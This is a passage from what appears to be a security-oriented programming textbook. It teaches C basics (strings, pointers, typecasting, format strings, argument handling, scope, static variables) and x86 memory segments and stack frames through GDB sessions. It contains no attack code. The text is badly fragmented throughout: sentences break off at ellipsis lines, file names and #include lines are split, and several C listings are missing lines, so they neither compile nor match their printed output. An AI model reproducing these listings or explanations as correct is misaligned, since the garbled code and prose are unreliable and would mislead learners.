(gdb) x/2i $eip
0x8048393 : mov DWORD PTR [esp],0x8048484
0x804839a : call 0x80482a0
(gdb) x/xw $esp
0xbffff800: 0xb8000ce0
(gdb) nexti
0x0804839a 8 printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800: 0x08048484
(gdb)

The next instruction is actually the call to the printf() function; it prints the data
string
...

(gdb) x/i $eip
0x804839a : call 0x80482a0
(gdb) nexti
Hello, world!

6 for(i=0; i < 10; i++)
(gdb)

Continuing to use GDB to debug, let's examine the next two instructions
...

(gdb) x/2i $eip
0x804839f : lea eax,[ebp-4]
0x80483a2 : inc DWORD PTR [eax]
(gdb)

These two instructions basically just increment the variable i by 1
...
The execution of this instruction is
shown below
...
The execution of this instruction is also shown
below
...
This behavior corresponds to a portion of C code
in which the variable i is incremented in the for loop
...

(gdb) x/i $eip
0x80483a4 : jmp 0x804838b
(gdb)

When this instruction is executed, it will send the program back to the instruction
at address 0x804838b
...

Looking at the full disassembly again, you should be able to tell which parts of the
C code have been compiled into which machine instructions
...

(gdb) list
1 #include ...
The program execution will jump back to the compare instruction, continue to execute
the printf() call, and increment the counter variable until it finally equals 10
...

Back to Basics
Now that the idea of programming is less abstract, there are a few other
important concepts to know about C
...
In the same way that
knowing a little about Latin can greatly improve one's understanding of the
English language, knowledge of low-level programming concepts can assist the
comprehension of higher-level ones
...

Strings
The value "Hello, world!\n" passed to the printf() function in the previous
program is a string—technically, a character array
...
A 20-character array is simply 20 adjacent
characters located in memory
...
The
char_array
...

char_array
...
h>
int main()
{
char str_a[20];
str_a[0] = 'H';
str_a[1] = 'e';
str_a[2] = 'l';
str_a[3] = 'l';
str_a[4] = 'o';
str_a[5] = ',';
str_a[6] = ' ';
str_a[7] = 'w';
str_a[8] = 'o';
str_a[9] = 'r';
str_a[10] = 'l';
str_a[11] = 'd';
str_a[12] = '!';
str_a[13] = '\n';
str_a[14] = 0;
printf(str_a);
}

The GCC compiler can also be given the -o switch to define the output file to
compile to
...

reader@hacking:~/booksrc $ gcc -o char_array char_array
...
/char_array
Hello, world!

reader@hacking:~/booksrc $

In the preceding program, a 20-element character array is defined as str_a, and
each element of the array is written to, one by one
...
Also notice that the last character is a 0
...
The character array was defined, so 20 bytes are allocated for it, but
only 15 of these bytes are actually used (14 characters plus the terminating null byte)
...
The remaining extra bytes are just garbage and will be
ignored
...

Since setting each character in a character array is painstaking and strings are
used fairly often, a set of standard functions was created for string manipulation
...
The order of
the function's arguments is similar to Intel assembly syntax: destination first and
then source
...
c program can be rewritten using strcpy() to
accomplish the same thing using the string library
...
h since it uses a string function
...
c
#include ...
h>
int main() {
char str_a[20];
strcpy(str_a, "Hello, world!\n");
printf(str_a);
}

Let's take a look at this program with GDB
...
The debugger will pause the program at each
breakpoint, giving us a chance to examine registers and memory
...

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2
...
/char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
c, line 6
...

Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending
...
c, line 8
...
At each
breakpoint, we're going to look at EIP and the instructions it points to
...

(gdb) run
Starting program: /home/reader/booksrc/char_array2
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved
Breakpoint 1, main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r eip
eip 0xb7f076f4 0xb7f076f4

(gdb) x/5i $eip
0xb7f076f4 : mov esi,DWORD PTR [ebp+8]
0xb7f076f7 : mov eax,DWORD PTR [ebp+12]
0xb7f076fa : mov ecx,esi
0xb7f076fc : sub ecx,eax
0xb7f076fe : mov edx,eax
(gdb) continue
Continuing
...
c:8
8 printf(str_a);
(gdb) i r eip
eip 0x80483d7 0x80483d7
(gdb) x/5i $eip
0x80483d7 : lea eax,[ebp-40]
0x80483da : mov DWORD PTR [esp],eax
0x80483dd : call 0x80482d4
0x80483e2 : leave
0x80483e3 : ret
(gdb)

The address in EIP at the middle breakpoint is different because the code for the
strcpy() function comes from a loaded library
...
I'd like to point out that EIP is able to travel
from the main code to the strcpy() code and back again
...
The stack lets
EIP return through long chains of function calls
...
In the output below, the stack backtrace is shown at
each breakpoint
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2
Error in re-setting breakpoint 4:
Function "strcpy" not defined
...
c:7
7 strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0 main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) bt
#0 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
#1 0x080483d7 in main () at char_array2
...

Breakpoint 3, main () at char_array2
...
c:8
(gdb)

At the middle breakpoint, the backtrace of the stack shows its record of the
strcpy() call
...
This is due to an exploit protection
method that is turned on by default in the Linux kernel since 2
...
11
...

Signed, Unsigned, Long, and Short
By default, numerical values in C are signed, which means they can be both
negative and positive
...

Since it's all just memory in the end, all numerical values must be stored in binary,
and unsigned values make the most sense in binary
...
A 32-bit
signed integer is still just 32 bits, which means it can only be in one of 2^32 possible
bit combinations
...
Essentially, one of the bits is a flag marking the value positive
or negative
...

Two's complement represents negative numbers in a form suited for binary adders—
when a negative value in two's complement is added to a positive number of the
same magnitude, the result will be 0
...
It sounds
strange, but it works and allows negative numbers to be added in combination
with positive numbers using simple binary adders
...
For simplicity's sake, 8-bit numbers are used in this example
...
Then all the bits are
flipped, and 1 is added to result in the two's complement representation for
negative 73, 10110111
...
The program pcalc shows the value 256 because it's not
aware that we're only dealing with 8-bit values
...
This example might shed some light on how two's complement
works its magic
...
An unsigned integer would be declared with
unsigned int
...
The actual sizes will vary
depending on the architecture the code is compiled for
...
This works like a function that takes a data type as its input and returns the
size of a variable declared with that data type for the target architecture
...
c program explores the sizes of various data types, using the
sizeof() function
...
c
#include ...
It uses
something called a format specifier to display the value returned from the
sizeof() function calls
...

reader@hacking:~/booksrc $ gcc datatype_sizes
...
/a
...
A float is also four bytes, while a char only needs a single
byte
...

Pointers
The EIP register is a pointer that "points" to the current instruction during a
program's execution by containing its memory address
...
Since the physical memory cannot actually be moved, the
information in it must be copied
...

This is also expensive from a memory standpoint, since space for the new
destination copy must be saved or allocated before the source can be copied
...
Instead of copying a large block of
memory, it is much simpler to pass around the address of the beginning of that
block of memory
...
Since memory
on the x86 architecture uses 32-bit addressing, pointers are also 32 bits in size (4
bytes)
...

Instead of defining a variable of that type, a pointer is defined as something that
points to data of that type
...
c program is an example of a pointer being
used with the char data type, which is only 1 byte in size
...
c
#include ...
h>
int main() {

char str_a[20]; // A 20-element character array
char *pointer; // A pointer, meant for a character array
char *pointer2; // And yet another one
strcpy(str_a, "Hello, world!\n");
pointer = str_a; // Set the first pointer to the start of the array
...

printf(pointer2); // Print it
...

printf(pointer); // Print again
...
When the character array is referenced like this, it is actually
a pointer itself
...
The second pointer is set to the first pointer's
address plus two, and then some things are printed (shown in the output below)
...
c
reader@hacking:~/booksrc $
...
The program is recompiled, and a breakpoint is
set on the tenth line of the source code
...

reader@hacking:~/booksrc $ gcc -g -o pointer pointer
...
/pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...

(gdb)
11 printf(pointer);
12
13 pointer2 = pointer + 2; // Set the second one 2 bytes further in
...

15 strcpy(pointer2, "y you guys!\n"); // Copy into that spot
...

17 }
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer
...

(gdb) run
Starting program: /home/reader/booksrc/pointer

Breakpoint 1, main () at pointer
...
Remember that the string
itself isn't stored in the pointer variable—only the memory address 0xbffff7e0 is
stored there
...
The address-of operator is a unary operator, which simply
means it operates on a single argument
...
When it's used, the address of that variable is
returned, instead of the variable itself
...

(gdb) x/xw &pointer
0xbffff7dc: 0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

When the address-of operator is used, the pointer variable is shown to be located
at the address 0xbffff7dc in memory, and it contains the address 0xbffff7e0
...
The addressof
...
This
line is shown in bold below
...
c
#include ...

reader@hacking:~/booksrc $ gcc -g addressof
...
/a
...
so
...

(gdb) list
1 #include ...

8 }
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:8
8 }
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

As usual, a breakpoint is set and the program is executed in the debugger
...
The first print command shows
the value of int_var, and the second shows its address using the address-of
operator
...

An additional unary operator called the dereference operator exists for use with
pointers
...
It takes the form of an asterisk in front of
the variable name, similar to the declaration of a pointer
...
Used in GDB, it can retrieve
the integer value int_ptr points to
...
c code (shown in addressof2
...
The added printf() functions use format parameters,
which I'll explain in the next section
...

addressof2
...
h>
int main() {
int int_var = 5;
int *int_ptr;
int_ptr = &int_var; // Put the address of int_var into int_ptr
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005
int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5
reader@hacking:~/booksrc $

When the unary operators are used with pointers, the address-of operator can be
thought of as moving backward, while the dereference operator moves forward in
the direction the pointer is pointing
...
This
function can also use format strings to print variables in many different formats
...
The way the printf() function has been used in the previous
programs, the "Hello, world!\n" string technically is the format string;
however, it is devoid of special escape sequences
...
Each format parameter begins with a
percent sign (%) and uses a single-character shorthand very similar to formatting
characters used by GDB's examine command
...
There are also some format parameters that expect pointers, such as
the following
...
The %n format parameter
is unique in that it actually writes data
...

For now, our focus will just be the format parameters used for displaying data
...
c program shows some examples of different format parameters
...
c
#include ...
The final printf()
call uses the argument &A, which will provide the address of the variable A
...

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings
...
/fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: ' 31337', '00031337'
[string] sample Address bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

The first two calls to printf() demonstrate the printing of variables A and B,
using different format parameters
...
The %d
format parameter allows for negative values, while %u does not, since it is
expecting unsigned values
...
This is because A is a negative number stored in two's complement,
and the format parameter is trying to print it as if it were an unsigned value
...

The third line in the example, labeled [field width on B], shows the use of the
field-width option in a format parameter
...
However, this is not a
maximum field width—if the value to be outputted is greater than the field width,
the field width will be exceeded
...
When 10 is used as the field width, 5 bytes of blank space are
outputted before the output data
...
When 08 is used, for
example, the output is 00031337
...
Remember that the variable string is actually a pointer containing the
address of the string, which works out wonderfully, since the %s format parameter
expects its data to be passed by reference
...
This value is displayed as eight hexadecimal
digits, padded by zeros
...
Minimum field widths can be set by putting a number
right after the percent sign, and if the field width begins with 0, it will be padded
with zeros
...
So far, so good
...
One key difference is that the scanf() function expects all of its
arguments to be pointers, so the arguments must actually be variable addresses—
not the variables themselves
...
The
input
...

input
...
h>
#include ...
c, the scanf() function is used to set the count variable
...

reader@hacking:~/booksrc $ gcc -o input input
...
/input
Repeat how many times? 3
0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $
...
In
addition, the ability to output the values of variables allows for debugging in the
program, without the use of a debugger
...

Typecasting
Typecasting is simply a way to temporarily change a variable's data type, despite
how it was originally defined
...
The syntax for typecasting is as follows:
(typecast_data_type) variable

This can be used when dealing with integers and floating-point variables, as
typecasting
...

typecasting
...
h>
int main() {
int a, b;
float c, d;

a = 13;
b = 5;
c = a / b; // Divide using integers
...

printf("[integers]\t a = %d\t b = %d\n", a, b);
printf("[floats]\t c = %f\t d = %f\n", c, d);
}

The results of compiling and executing typecasting
...

reader@hacking:~/booksrc $ gcc typecasting
...
/a
...
000000 d = 2
...

However, if these integer variables are typecast into floats, they will be treated as
such
...
6
...
Even though a pointer is just a memory address, the C
compiler still demands a data type for every pointer
...
An integer pointer should only point to integer data,
while a character pointer should only point to character data
...
An integer is four bytes in size, while a character only takes
up a single byte
...
c program will demonstrate and explain these
concepts further
...
This is shorthand meant for displaying pointers and is basically
equivalent to 0x%08x
...
c
#include ...

printf("[integer pointer] points to %p, which contains the integer %d\n",
int_pointer, *int_pointer);
int_pointer = int_pointer + 1;

}
for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer
...
Two pointers are also defined, one with the
integer data type and one with the character data type, and they are set to point
at the start of the corresponding data arrays
...
In the loops, when the integer and character values are actually
printed with the %d and %c format parameters, notice that the corresponding
printf() arguments must dereference the pointer variables
...

reader@hacking:~/booksrc $ gcc pointer_types
...
/a
...
Since a char is only 1 byte, the pointer to the next char would
naturally also be 1 byte over
...

In pointer_types2
...
The major changes to the code are marked
in bold
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = char_pointer + 1;
}
}

The output below shows the warnings spewed forth from the compiler
...
c
pointer_types2
...
c:12: warning: assignment from incompatible pointer type
pointer_types2
...
But the compiler and
perhaps the programmer are the only ones that care about a pointer's type
...

reader@hacking:~/booksrc $
...
out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff818, which contains the char '8'
[integer pointer] points to 0xbffff81c, which contains the char '
[integer pointer] points to 0xbffff820, which contains the char '?'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f1, which contains the integer 0
[char pointer] points to 0xbffff7f2, which contains the integer 0
[char pointer] points to 0xbffff7f3, which contains the integer 0
[char pointer] points to 0xbffff7f4, which contains the integer 2
reader@hacking:~/booksrc $

Even though the int_pointer points to character data that only contains 5 bytes
of data, it is still typed as an integer
...
Similarly, the char_pointer's address is
only incremented by 1 each time, stepping through the 20 bytes of integer data
(five 4-byte integers), one byte at a time
...
The 4-byte value of 0x00000001 is actually stored in memory as 0x01, 0x00,
0x00, 0x00
...
Since the pointer type determines the size of the data
it points to, it's important that the type is correct
...
c below, typecasting is just a way to change the type of a variable
on the fly
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = (char *) ((int *) char_pointer + 1);
}
}

In this code, when the pointers are initially set, the data is typecast into the
pointer's data type
...
To fix
that, when 1 is added to the pointers, they must first be typecast into the correct
data type so the address is incremented by the correct amount
...
It doesn't look
too pretty, but it works
...
c
reader@hacking:~/booksrc $
...
out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff811, which contains the char 'b'
[integer pointer] points to 0xbffff812, which contains the char 'c'
[integer pointer] points to 0xbffff813, which contains the char 'd'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f4, which contains the integer 2
[char pointer] points to 0xbffff7f8, which contains the integer 3
[char pointer] points to 0xbffff7fc, which contains the integer 4
[char pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

Naturally, it is far easier just to use the correct data type for pointers in the first
place; however, sometimes a generic, typeless pointer is desired
...
Experimenting with
void pointers quickly reveals a few things about typeless pointers
...
In order to retrieve the value
stored in the pointer's memory address, the compiler must first know what type of
data it is
...
These are fairly intuitive limitations, which means that a void pointer's
main purpose is to simply hold a memory address
...
c program can be modified to use a single void pointer by
typecasting it to the proper type each time it's used
...
This also means a void pointer must always be typecast when
dereferencing it, however
...
c,
which uses a void pointer
...
c
#include ...

printf("[char pointer] points to %p, which contains the char '%c'\n",
void_pointer, *((char *) void_pointer));
void_pointer = (void *) ((char *) void_pointer + 1);
}
void_pointer = (void *) int_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff7f0, which contains the integer 1

[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

The compilation and output of this pointer_types4
...
c
...

Since the type is taken care of by the typecasts, the void pointer is truly nothing
more than a memory address
...
In pointer_types5
...

pointer_types5
...
h>
int main() {
int i;
char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
int int_array[5] = {1, 2, 3, 4, 5};
unsigned int hacky_nonpointer;
hacky_nonpointer = (unsigned int) char_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
hacky_nonpointer, *((int *) hacky_nonpointer));
hacky_nonpointer = hacky_nonpointer + sizeof(int);
}
}

This is rather hacky, but since this integer value is typecast into the proper
pointer types when it is assigned and de-referenced, the end result is the same
...

reader@hacking:~/booksrc $ gcc pointer_types5
...
/a
...
In the end, after the program has
been compiled, the variables are nothing more than memory addresses
...

Command-Line Arguments
Many nongraphical programs receive input in the form of command-line
arguments
...
This tends to be
more efficient and is a useful input method
...
The integer will contain the number of arguments, and the array
of strings will contain each of those arguments
...
c program and
its execution should explain things
...
c
#include ...
c
reader@hacking:~/booksrc $
...
/commandline
reader@hacking:~/booksrc $
...
/commandline
argument #1 - this
argument #2 - is
argument #3 - a
argument #4 - test
reader@hacking:~/booksrc $

The zeroth argument is always the name of the executing binary, and the rest of
the argument array (often called an argument vector) contains the remaining
arguments as strings
...
Regardless of this, the argument is passed in as a string;
however, there are standard conversion functions
...
The most common of these functions is atoi(), which is short for
ASCII to integer
...
Observe its usage in convert
...

convert
...
h>
void usage(char *program_name) {
printf("Usage: %s <message> <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
if(argc < 3) // If fewer than 3 arguments are used,
usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert
...

reader@hacking:~/booksrc $ gcc convert
...
/a
...
/a
...
/a
...

0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $

In the preceding code, an if statement makes sure that three arguments are
used before these strings are accessed
...
In C it's important to check for these types of conditions and
handle them in program logic
...
The convert2
...

convert2
...
h>
void usage(char *program_name) {
printf("Usage: %s <message> <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
// if(argc < 3) // If fewer than 3 arguments are used,
// usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert2
...

reader@hacking:~/booksrc $ gcc convert2
...
/a
...
This results
in the program crashing due to a segmentation fault
...
When the program attempts to access an address that is out of
bounds, it will crash and die in what's called a segmentation fault
...

reader@hacking:~/booksrc $ gcc -g convert2
...
/a
...
so
...

(gdb) run test
Starting program: /home/reader/booksrc/a
...

0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
(gdb) where
#0 0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
#1 0xb800183c in ?? ()
#2 0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2
...

(gdb) run test
The program being debugged has been started already
...
out test
Breakpoint 1, main (argc=2, argv=0xbffff894) at convert2
...

Program received signal SIGSEGV, Segmentation fault
...
so
...
out"
(gdb) x/s 0xbffff9ce
0xbffff9ce: "test"
(gdb) x/s 0x00000000
0x0:

(gdb) quit
The program is running
...
The where command will sometimes
show a useful backtrace of the stack; however, in this case, the stack was too
badly mangled in the crash
...
Since the
argument vector is a pointer to a list of strings, it is actually a pointer to a list of
pointers
...
The first one is the zeroth argument, the second is the test argument,
and the third is zero, which is out of bounds
...

Variable Scoping
Another interesting concept regarding memory in C is variable scoping or context
—in particular, the contexts of variables within functions
...
In fact,
multiple calls to the same function all have their own contexts
...
c
...
c
#include ...

reader@hacking:~/booksrc $ gcc scope
...
/a
...
Notice that
within the main() function, the variable i is 3, even after calling func1() where
the variable i is 5
...
The best way to think of this is that
each function call has its own version of the variable i
...
Variables are global if they are defined at the beginning of the code,
outside of any functions
...
c example code shown below, the variable
j is declared globally and set to 42
...

scope2
...
h>
int j = 42; // j is a global variable
...

printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}
void func2() {
int i = 7;
printf("\t\t[in func2] i = %d, j = %d\n", i, j);
printf("\t\t[in func2] setting j = 1337\n");
j = 1337; // Writing to j
func3();

printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}
void func1() {
int i = 5;
printf("\t[in func1] i = %d, j = %d\n", i, j);
func2();
printf("\t[back in func1] i = %d, j = %d\n", i, j);
}
int main() {
int i = 3;
printf("[in main] i = %d, j = %d\n", i, j);
func1();
printf("[back in main] i = %d, j = %d\n", i, j);
}

The results of compiling and executing scope2
...

reader@hacking:~/booksrc $ gcc scope2
...
/a
...

In this case, the compiler prefers to use the local variable
...
The global variable j is just stored in memory, and every
function is able to access that memory
...

Printing the memory addresses of these variables will give a clearer picture of
what's going on
...
c example code below, the variable addresses are
printed using the unary address-of operator
...
c
#include ...

void func3() {
int i = 11, j = 999; // Here, j is a local variable of func3()
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
[in func1] i @ 0xbffff814 = 5
[in func1] j @ 0x08049988 = 42
[in func2] i @ 0xbffff7f4 = 7
[in func2] j @ 0x08049988 = 42
[in func2] setting j = 1337
[in func3] i @ 0xbffff7d4 = 11
[in func3] j @ 0xbffff7d0 = 999
[back in func2] i @ 0xbffff7f4 = 7
[back in func2] j @ 0x08049988 = 1337
[back in func1] i @ 0xbffff814 = 5
[back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

In this output, it is obvious that the variable j used by func3() is different than
the j used by the other functions
...
Also, notice that
the variable i is actually at a different memory address for each function
...

Then the backtrace command shows the record of each function call on the stack
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
3 int j = 42; // j is a global variable
...

7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8 printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9 }
10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:7
7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0 func3 () at scope3
...
c:17
#2 0x0804849f in func1 () at scope3
...
c:35
(gdb)

The backtrace also shows the nested function calls by looking at records kept on
the stack
...
Each line in the backtrace corresponds to a stack frame
...
The local variables contained in
each stack frame can be shown in GDB by adding the word full to the backtrace
command
...
c:7
i = 11
j = 999
#1 0x0804841d in func2 () at scope3
...
c:26
i = 5
#3 0x0804852b in main () at scope3
...
The global version of the variable j is used in the other functions'
contexts
...
Similar to global
variables, a static variable remains intact between function calls; however, static
variables are also akin to local variables since they remain local within a
particular function context
...
The code in static
...

static
...
h>
void function() { // An example function, with its own context
int var = 5;
static int static_var = 5; // Static variable initialization
printf("\t[in function] var = %d\n", var);
printf("\t[in function] static_var = %d\n", static_var);
var++; // Add one to var
...

}
int main() { // The main function, with its own context
int i;
static int static_var = 1337; // Another static, in a different context
for(i=0; i < 5; i++) { // Loop 5 times
...

}
}

The aptly named static_var is defined as a static variable in two places: within
the context of main() and within the context of function()
...
The function
simply prints the values of the two variables in its context and then adds 1 to both
of them
...

reader@hacking:~/booksrc $ gcc static
...
/a
...
This is because static variables retain their values, but also because
they are only initialized once
...

Once again, printing the addresses of these variables with the unary address-of
operator will provide greater visibility into what's really going
on
...
c for an example
...
c
#include ...

static_var++; // Add 1 to static_var
...

}
}

The results of compiling and executing static2
...

reader@hacking:~/booksrc $ gcc static2
...
/a
...
You may
have noticed that the addresses of the local variables all have very high
addresses, like 0xbffff814, while the global and static variables all have very low
memory addresses, like 0x0804968c and 0x8049688
...

Read on for your answers
...
Each segment represents a special portion of memory that is set aside
for a certain purpose
...
This is where the
assembled machine language instructions of the program are located
...
As a program executes,
the EIP is set to the first instruction in the text segment
...
Reads the instruction that EIP is pointing to
2
...
Executes the instruction that was read in step 1
4
...
The processor doesn't care about the
change, because it's expecting the execution to be nonlinear anyway
...

Write permission is disabled in the text segment, as it is not used to store
variables, only code
...

Another advantage of this segment being read-only is that it can be shared among
different copies of the program, allowing multiple executions of the program at
the same time without any problems
...

The data and bss segments are used to store global and static program variables
...
Although these segments are
writable, they also have a fixed size
...
Both
global and static variables are able to persist because they are stored in their own
memory segments
...
Blocks
of memory in this segment can be allocated and used for whatever the
programmer might need
...
All of the memory within
the heap is managed by allocator and deallocator algorithms, which respectively
reserve a region of memory in the heap for use and remove reservations to allow
that portion of memory to be reused for later reservations
...
This means a
programmer using the heap allocation functions can reserve and free memory on
the fly
...

The stack segment also has variable size and is used as a temporary scratch pad to
store local function variables and context during function calls
...
When a program calls a function, that function will
have its own set of passed variables, and the function's code will be at a different
memory location in the text (or code) segment
...
All of this information is
stored together on the stack in what is collectively called a stack frame
...

In general computer science terms, a stack is an abstract data structure that is
used frequently
...
Think of it as putting beads on
a piece of string that has a knot on one end—you can't get the first bead off until
you have removed all the other beads
...

As the name implies, the stack segment of memory is, in fact, a stack data
structure, which contains stack frames
...
Since this is very dynamic behavior, it makes
sense that the stack is also not of a fixed size
...

The FILO nature of a stack might seem odd, but since the stack is used to store
context, it's very useful
...
The EBP register, sometimes called the frame
pointer (FP) or local base (LB) pointer, is used to reference local function variables in
the current stack frame
...
The SFP
is used to restore EBP to its previous value, and the return address is used to restore
EIP to the next instruction found after the function call
...

The following stack_example
...

Memory Segmentation
stack_example
...
The local variables for the function include a
single character called flag and a 10-character buffer called buffer
...
After compiling the program, its
inner workings can be examined with GDB
...
The main()
function starts at 0x08048357 and test_function() starts at 0x08048344
...

These instructions are collectively called the procedure prologue or function prologue
...
Sometimes the function prologue will handle some stack
alignment as well
...

reader@hacking:~/booksrc $ gcc -g stack_example
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main():
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax
0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1
0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
0x08048344 : push ebp
0x08048345 : mov ebp,esp
0x08048347 : sub esp,0x28
0x0804834a : mov DWORD PTR [ebp-12],0x7a69
0x08048351 : mov BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
(gdb)

When the program is run, the main() function is called, which simply calls
test_function()
...
When
test_function() is called, the function arguments are pushed onto the stack in
reverse order (since it's FILO)
...

These values correspond to the variables d, c, b, and a in the function
...

(gdb) disass main
Dump of assembler code for function main:
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax
0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1
0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb)

Next, when the assembly call instruction is executed, the return address is pushed
onto the stack and the execution flow jumps to the start of test_function() at
0x08048344
...
In this case, the return address would point
to the leave instruction in main() at 0x0804838b
...
In this step, the current value of EBP
is pushed to the stack
...
The current value of ESP is
then copied into EBP to set the new frame pointer
...
Memory is saved
for these variables by subtracting from ESP
...

We can watch the stack frame construction on the stack using GDB
...
GDB will put the
first breakpoint before the function arguments are pushed to the stack, and the
second breakpoint after test_function()'s procedure prologue
...

(gdb) list main
4
5 flag = 31337;
6 buffer[0] = 'A';
7 }
8
9 int main() {
10 test_function(1, 2, 3, 4);
11 }
(gdb) break 10
Breakpoint 1 at 0x8048367: file stack_example
...

(gdb) break test_function
Breakpoint 2 at 0x804834a: file stack_example
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:10
10 test_function(1, 2, 3, 4);
(gdb) i r esp ebp eip
esp 0xbffff7f0 0xbffff7f0
ebp 0xbffff808 0xbffff808
eip 0x8048367 0x8048367
(gdb) x/5i $eip
0x8048367 : mov DWORD PTR [esp+12],0x4
0x804836f : mov DWORD PTR [esp+8],0x3
0x8048377 : mov DWORD PTR [esp+4],0x2
0x804837f : mov DWORD PTR [esp],0x1
0x8048386 : call 0x8048344
(gdb)

This breakpoint is right before the stack frame for the test_function() call is
created
...
The next breakpoint is right after the procedure prologue for
test_function(), so continuing will build the stack frame
...
The local variables (flag and
buffer) are referenced relative to the frame pointer (EBP)
...

